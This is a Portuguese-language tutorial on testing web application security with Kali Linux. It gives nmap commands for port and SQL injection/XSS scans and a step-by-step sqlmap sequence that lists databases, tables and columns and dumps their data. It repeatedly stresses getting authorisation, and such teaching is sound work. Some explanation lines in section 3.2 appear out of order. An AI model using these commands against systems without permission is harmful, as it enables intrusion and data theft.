1. Introdução
O Kali Linux é uma distribuição Linux desenvolvida especificamente para testes de penetração e hacking ético. Ele vem com mais de 600 ferramentas pré-instaladas para testes de penetração, incluindo ferramentas para varredura de portas, análise de vulnerabilidades, quebra de senhas, entre outras.
Para testar a segurança de web applications, o Kali Linux inclui várias ferramentas populares, como o Nmap, o SQLMap, o Burp Suite e o OWASP ZAP. Essas ferramentas permitem que você identifique vulnerabilidades comuns em web applications, como injeção de SQL e Cross-Site Scripting (XSS).
1.1 Configurando o ambiente para testes de penetração em web applications
Antes de começar a testar a segurança de web applications, é importante configurar o ambiente corretamente. Isso inclui a instalação do Kali Linux em uma máquina virtual ou em um computador dedicado para testes de penetração. Você também precisará configurar seu ambiente de teste, que pode incluir um servidor web, um banco de dados e quaisquer outros componentes necessários para a aplicação.
É importante lembrar que você deve obter permissão antes de testar a segurança de qualquer web application. Testar a segurança de web applications sem autorização pode ser ilegal e pode resultar em consequências legais.
1.2 Identificando vulnerabilidades em web applications
Uma vez que o ambiente esteja configurado, você pode começar a identificar vulnerabilidades em web applications. Existem várias técnicas que você pode usar para identificar vulnerabilidades em web applications, incluindo varredura de portas, varredura de vulnerabilidades e testes de injeção de SQL e XSS.
A varredura de portas é uma técnica usada para identificar quais portas estão abertas em um servidor web. Isso pode ajudá-lo a identificar quais serviços estão sendo executados no servidor e quais portas podem ser vulneráveis a ataques.
A varredura de vulnerabilidades é uma técnica usada para identificar vulnerabilidades conhecidas em web applications. Isso pode ser feito usando ferramentas como o Nmap e o OWASP ZAP.
Os testes de injeção de SQL e XSS são técnicas usadas para identificar vulnerabilidades específicas em web applications. A injeção de SQL é uma técnica usada para explorar vulnerabilidades em bancos de dados, enquanto o XSS é uma técnica usada para explorar vulnerabilidades em scripts do lado do cliente.
1.3 Usando ferramentas do Kali Linux para testes de penetração em web applications
Uma vez que as vulnerabilidades são identificadas, você pode usar as ferramentas do Kali Linux para testar a segurança de web applications. O Nmap é uma ferramenta usada para varredura de portas e pode ser usado para identificar quais serviços estão sendo executados em um servidor web.
O SQLMap é uma ferramenta usada para testes de injeção de SQL e pode ser usada para explorar vulnerabilidades em bancos de dados. O OWASP ZAP é uma ferramenta usada para testes de XSS e pode ser usada para explorar vulnerabilidades em scripts do lado do cliente.
O Burp Suite é uma ferramenta completa para testes de penetração em web applications, que permite varredura de vulnerabilidades, exploração de vulnerabilidades e interceptação e manipulação de tráfego HTTP/S. É uma das ferramentas mais populares usadas para testes de penetração em web applications.
1.4 Explorando vulnerabilidades em web applications e obtendo acesso não autorizado
Quando uma vulnerabilidade é identificada, é importante explorá-la para entender sua gravidade e impacto. Isso pode envolver a execução de comandos maliciosos em um servidor web, a extração de dados confidenciais de um banco de dados ou a obtenção de acesso não autorizado a um sistema.
É importante lembrar que a exploração de vulnerabilidades em web applications sem autorização pode ser ilegal e pode resultar em consequências legais. É importante obter permissão antes de explorar qualquer vulnerabilidade em um ambiente de teste.
1.5 Realizando Portscan e busca por vulnerabilidades com Nmap
Uma das técnicas de teste de penetração em web applications é a realização de um portscan, que permite identificar quais portas estão abertas em um servidor web e quais serviços estão sendo executados nesses portas. O Nmap é uma ferramenta muito utilizada para essa finalidade.
2. Vulnerabilidade com NMAP
nmap -sV -p 1-65535 <IP do servidor web>
Este comando irá realizar um portscan em todas as portas (1-65535) do servidor web especificado e irá identificar os serviços que estão sendo executados em cada porta.
Após a realização do portscan, você pode utilizar o Nmap para identificar vulnerabilidades de SQL Injection e XSS. Para isso, você pode executar os seguintes comandos:
2.1 Vulnerabilidades de SQL Injection:
nmap -sV --script=http-sql-injection <IP do servidor web>
Este comando irá identificar vulnerabilidades de SQL Injection em web applications que estejam sendo executadas no servidor web especificado.
2.2 Identificar vulnerabilidades de XSS:
nmap -sV --script=http-dombased-xss <IP do servidor web>
Este comando irá identificar vulnerabilidades de XSS baseadas em domínio em web applications que estejam sendo executadas no servidor web especificado.
Lembre-se que a identificação de vulnerabilidades em web applications sem autorização prévia pode ser ilegal. Por isso, é importante obter permissão antes de realizar qualquer teste de penetração em web applications.
3. Explorando Vulnerabilidades com SQL Map
O Sqlmap é uma ferramenta muito poderosa para explorar vulnerabilidades de SQL Injection em web applications. Com essa ferramenta, é possível automatizar a identificação e exploração de vulnerabilidades de SQL Injection, tornando o processo muito mais fácil e rápido.
3.1 Coletando banco
Para explorar uma vulnerabilidade de SQL Injection usando o Sqlmap, você pode executar o seguinte comando:
sqlmap -u "http://<IP do servidor web>/página-vulnerável.php?id=1" --dbs
Este comando irá explorar a vulnerabilidade de SQL Injection na página "página-vulnerável.php" que está hospedada no servidor web especificado e irá tentar identificar os bancos de dados que estão sendo usados pela aplicação.
3.2 Coletando tabelas
Após identificar os bancos de dados, você pode executar o seguinte comando para obter uma lista de todas as tabelas no banco de dados:
sqlmap -u "http://<IP do servidor web>/página-vulnerável.php?id=1" -D <nome do banco de dados> --tables
Este comando irá obter uma lista de todas as tabelas no banco de dados especificado.
Este comando irá obter uma lista de todas as colunas na tabela especificada.
Este comando irá obter os dados das colunas especificadas na tabela especificada.
3.3 Realizando Dump de colunas
Em seguida, você pode executar o seguinte comando para obter uma lista de todas as colunas na tabela desejada:
sqlmap -u "http://<IP do servidor web>/página-vulnerável.php?id=1" -D <nome do banco de dados> -T <nome da tabela> --columns
Por fim, você pode executar o seguinte comando para obter os dados da tabela desejada:
sqlmap -u "http://<IP do servidor web>/página-vulnerável.php?id=1" -D <nome do banco de dados> -T <nome da tabela> -C <nome da coluna1>,<nome da coluna2>... --dump
Lembre-se que a exploração de vulnerabilidades de SQL Injection em web applications sem autorização prévia pode ser ilegal. Por isso, é importante obter permissão antes de realizar qualquer teste de penetração em web applications.